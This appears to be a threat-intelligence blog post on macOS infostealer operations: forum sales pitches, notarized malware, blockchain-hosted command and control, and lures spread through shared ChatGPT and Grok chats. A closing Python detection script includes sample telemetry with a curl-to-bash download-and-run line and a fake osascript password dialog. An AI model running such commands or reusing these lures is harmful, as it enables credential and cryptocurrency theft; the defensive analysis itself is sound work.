The macOS Stealer Gold Rush: How Cybercriminals Are Racing to Exploit Apple’s Ecosystem

February 10, 2026

From basement operations to sophisticated malware-as-a-service platforms, threat actors are flooding the underground with tools designed to crack Apple’s defenses, and they’re winning.

For years, Mac users operated under a comforting assumption: their devices were immune to the malware plaguing Windows users. That era is over. Across underground forums, a thriving economy has emerged around macOS infostealers, sophisticated tools designed to extract everything from browser passwords to cryptocurrency wallet seed phrases. The attackers aren’t adapting Windows techniques. They’re innovating specifically for Apple’s ecosystem, and they’re doing it at scale.

Key Takeaways

  • At least 103 Chrome crypto extensions are targeted by macOS stealers, with Exodus and Trezor phishing claiming to validate seed phrases in real-time to avoid detection.
  • Attackers obtained valid Apple developer signatures to bypass Gatekeeper, with MacSync malware successfully notarized and signed under Team ID GNJLS3UYZ4.
  • UNC5142 compromised over 14,000 WordPress sites since late 2023, using blockchain smart contracts on BNB Smart Chain for command-and-control infrastructure.
  • Threat actors abuse ChatGPT and Grok by posting malicious instructions, then promoting those chats via Google Ads to distribute AMOS stealer.
  • Monitor for unsigned apps requesting passwords, unusual Terminal activity, and blockchain connections from non-financial apps to detect macOS infostealers.
  • Criminal groups like Valhall88 on BDFClub operate revenue-sharing models, splitting crypto theft 50/50 while partners keep all non-cryptocurrency stolen data.

The Underground Marketplace: A Criminal Industry Takes Shape

A user calling themselves Valhall88 posted a recruitment pitch on BDFClub in late January, seeking partners to distribute their Mac stealer. The operational sophistication reveals how far this threat has evolved.

For example, take a look at this post from January 31, 2026:

Looking for traffickers to team up with for distributing a Mac OS stealer. On my end, I have a private stealer and we’ll work your traffic 50/50 (if you need logs, you can take them completely since we’re only interested in crypto)… 103 crypto extensions for Chrome… Ledger, Trezor, Exodus, Atomic send seed phrases to our common receiving server, from where they are distributed to users.


Note the revenue-sharing model, specialized infrastructure for seed phrase collection, and wallet-specific phishing that validates inputs to avoid tipping off victims. Valhall88 offers partners access to a statistics panel and describes elaborate presets: silent collection when cached passwords exist, forced collection disguised as system updates, and wallet-specific phishing windows that make Exodus auto-exfiltrate seed phrases without any visible anomaly. The wallet continues functioning normally after compromise, eliminating warning signs users might recognize.

That same week, another actor advertised on Voided: “BEST SOLUTION IN NFT SCAM SPHERE,” touting “2+ years experience” and promising “Mac/Win FUD Stealer” with full undetectability (View on Flare).

QuarkLab announced in February that their “Quark Panel 2.0” had launched with a completely rebuilt interface, boasting that “script compilation and deployment are now significantly faster and more intuitive” (View on Flare). They’re iterating based on user feedback, optimizing workflows, and treating malware distribution like any other software business. These operations have org charts, specialization, and long-term roadmaps.

From Terminal Tricks to Signed Applications: The Technical Evolution

Early macOS stealers relied on crude “drag-to-terminal” social engineering, asking users to paste commands into Terminal windows. By late 2025, that approach had become obsolete.

Jamf researchers discovered a MacSync sample delivered through a signed and notarized Swift application, hidden inside a DMG file masquerading as a legitimate messenger installer. The malware passed Gatekeeper checks because it carried a valid Apple developer signature.

At the time of analysis, the malware had a valid digital signature and successfully passed Gatekeeper checks. Jamf specialists confirmed that the Mach-O binary was signed and notarized, with the signature tied to Developer Team ID GNJLS3UYZ4… The malware artificially inflates the DMG file size to 25.5 MB using embedded PDF decoys, removes scripts used in the execution chain, and checks internet connectivity before launch to avoid running in isolated environments.


Apple revoked the certificate after researchers reported it, but the technique proved viable. Attackers now obtain legitimate developer credentials through theft, fraudulent applications, or purchases from compromised accounts. Once signed and notarized, their malware looks indistinguishable from legitimate software. Users see no warnings, no friction, just an apparently safe installation.

Attackers have weaponized Apple’s own trust infrastructure. The very mechanisms designed to protect users (code signing, notarization, Gatekeeper) have become vectors for exploitation. An actor named ParallelUnivers made this explicit in a January forum post advertising a “new resident agent for targeted work” supporting both Windows and Mac. “I don’t provide clean builds, always encrypted/packed,” they wrote, offering command execution, file management, and screenshot capabilities (View on Flare). The product comes with AV detection checks and a “tests are free” guarantee.

Weaponizing Trust: Legitimate Platforms as Attack Infrastructure

The most insidious evolution involves abusing platforms users inherently trust. Google’s Threat Intelligence Group tracked UNC5142, a financially motivated group that pioneered using blockchain smart contracts for command-and-control infrastructure. Since late 2023, they’ve compromised over 14,000 WordPress sites, injecting JavaScript that communicates with contracts on BNB Smart Chain to retrieve next-stage payloads.

The technique, called EtherHiding, offers attackers significant advantages. Blockchain data is immutable and distributed, making takedowns nearly impossible. The traffic blends with legitimate Web3 activity. Traditional network defenses struggle to distinguish malicious blockchain queries from benign ones. A forum post on Underc0de detailed how “UNC5142 combines the use of compromised WordPress sites with EtherHiding… using blockchain smart contracts” to distribute infostealers across Windows and macOS (View on Flare). Google observed no activity after July 2025, suggesting the group may be retooling.

Attackers have also turned AI platforms into distribution channels. Kaspersky and Huntress simultaneously discovered threat actors posting malicious instructions on ChatGPT and Grok, then promoting those shared chats via Google Ads. Users searching for legitimate software help encounter sponsored links to AI chatbot conversations that instruct them to paste terminal commands.

Distributors of the macOS stealer AMOS are mastering a new ClickFix scheme: they post malicious instructions on the websites ChatGPT and Grok, share their chats, and promote them to the top of Google search results by paying for advertising… Notably, the chatbot itself will confirm the danger of such a step if asked whether it should follow the instructions.


The technique exploits multiple trust layers simultaneously. Users trust Google search results, especially sponsored ones. They trust AI chatbots from reputable companies. They trust that instructions appearing on official OpenAI or X.AI domains must be legitimate. By the time they realize they’ve been compromised, the AMOS stealer has already exfiltrated their browser data, Keychain contents, and cryptocurrency wallets.

GitHub Pages has become another favored platform. LastPass documented a campaign where attackers registered GitHub Pages matching company names plus macOS terminology, boosting their search rankings. Users clicking these results get redirected through multiple hops before landing on sites instructing them to paste shell commands. The initial hosting on GitHub provides legitimacy: the platform’s reputation shields the attack’s first stage from scrutiny.

The Cryptocurrency Obsession: Why Macs Became High-Value Targets

Nearly every macOS stealer prioritizes cryptocurrency theft above all else. Valhall88’s recruitment post emphasized they only wanted crypto, offering partners complete access to other stolen data. The stealer targets 103 Chrome crypto extensions and includes wallet-specific phishing for Ledger, Trezor, Exodus, and Atomic. The Trezor phishing validates seed phrases in real time, notifying users if they enter incorrect words to avoid suspicion. Exodus auto-exfiltrates seed phrases after password entry, with the wallet functioning normally afterward.

This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse.

The sophistication extends across platforms. A forum post on BFD Forum noted that even mobile platforms face similar threats: “SpyAgent uses optical character recognition to scan images and steal sensitive information stored in images, including private key snapshots” (View on Flare). Attackers use OCR to extract keys from screenshots users thought were safe.

The cryptocurrency focus also explains the partnership models. Valhall88’s 50/50 split on “traffic” with partners keeping all non-crypto logs creates specialization. Some operators focus on distribution and social engineering. Others handle the technical infrastructure for wallet compromise and fund extraction. The division of labor mirrors legitimate business operations, with each party optimizing for their core competency.

What Defenders Must Understand

The “Macs don’t get viruses” assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.
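The detection points in the paragraph above can be expressed as simple triage rules. The following is an added example (not Flare’s code) run over constructed endpoint telemetry; the event schema, the financial-app allowlist, the RPC port and host patterns, and the use of an AppleScript dialog as the “app requesting a password” indicator are assumptions, while the revoked Team ID is the one the article reports.

```python
"""Triage constructed macOS endpoint events for the stealer TTPs listed in the article."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Team ID the article reports as revoked after the MacSync disclosure.
REVOKED_TEAM_IDS = {"GNJLS3UYZ4"}
# Apps expected to talk to blockchain nodes; anything else is suspicious (assumed allowlist).
FINANCIAL_APPS = {"Exodus", "Atomic Wallet", "Ledger Live", "Trezor Suite"}
# Assumed indicators: the default JSON-RPC port and a placeholder RPC host pattern.
RPC_PORT = 8545
RPC_HOST = re.compile(r"(^|\.)rpc\.example-chain\.invalid$", re.I)
# Assumed indicator: an AppleScript dialog collecting a hidden answer / password.
PASSWORD_PROMPT = re.compile(r"display dialog.*(hidden answer|password)", re.I)
# Pasted "download and run" one-liners typical of ClickFix-style terminal lures.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b", re.I)

@dataclass
class Event:
    kind: str                    # "exec" or "connect"
    process: str                 # executable or app name
    parent: str = ""             # parent process/app name
    cmdline: str = ""
    signed: bool = True          # False for unsigned or ad-hoc signed parents
    team_id: Optional[str] = None
    host: str = ""
    port: int = 0

def triage(events: List[Event]) -> List[str]:
    """Return one 'RULE: detail' string per event that matches a stealer TTP."""
    hits = []
    for e in events:
        # A valid signature alone is not trusted: a revoked Team ID counts as untrusted too.
        untrusted = (not e.signed) or (e.team_id in REVOKED_TEAM_IDS)
        if e.kind == "exec" and PASSWORD_PROMPT.search(e.cmdline) and untrusted:
            hits.append(f"UNTRUSTED_PASSWORD_PROMPT: {e.parent} via {e.process}")
        elif e.kind == "exec" and PIPE_TO_SHELL.search(e.cmdline):
            hits.append(f"PASTED_DOWNLOAD_AND_EXEC: {e.parent} -> {e.process}")
        elif (e.kind == "connect" and (e.port == RPC_PORT or RPC_HOST.search(e.host))
              and e.process not in FINANCIAL_APPS):
            hits.append(f"BLOCKCHAIN_RPC_FROM_NONFINANCIAL: {e.process} -> {e.host}:{e.port}")
    return hits

# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    Event("exec", "osascript", parent="Installer.app", signed=False,
          cmdline='osascript -e \'display dialog "macOS needs your password" with hidden answer\''),
    Event("exec", "bash", parent="Terminal", cmdline="curl -fsSL https://dl.example.invalid/setup | bash"),
    Event("connect", "Exodus", host="rpc.example-chain.invalid", port=443),
    Event("connect", "WeatherWidget", host="rpc.example-chain.invalid", port=8545),
    Event("exec", "osascript", parent="Messenger.app", team_id="GNJLS3UYZ4",
          cmdline='osascript -e \'display dialog "Update requires password" with hidden answer\''),
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The signed-but-revoked Messenger.app event fires alongside the unsigned one, which is the point of the article’s MacSync case: signature status must be checked against revocation, not just presence.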

User education must evolve beyond “don’t click suspicious links.” Attackers are compromising legitimate platforms, obtaining valid code signatures, and exploiting trusted services. The indicators users learned to recognize (warnings from Gatekeeper, unsigned applications, obvious phishing) no longer apply. Modern macOS malware looks legitimate because it often is legitimate until the moment it executes malicious payloads.

The underground economy shows no signs of slowing. With revenue-sharing models, professional development practices, and continuous technical innovation, macOS stealers have become a mature criminal industry. The gold rush is accelerating, and defenders are playing catch-up.
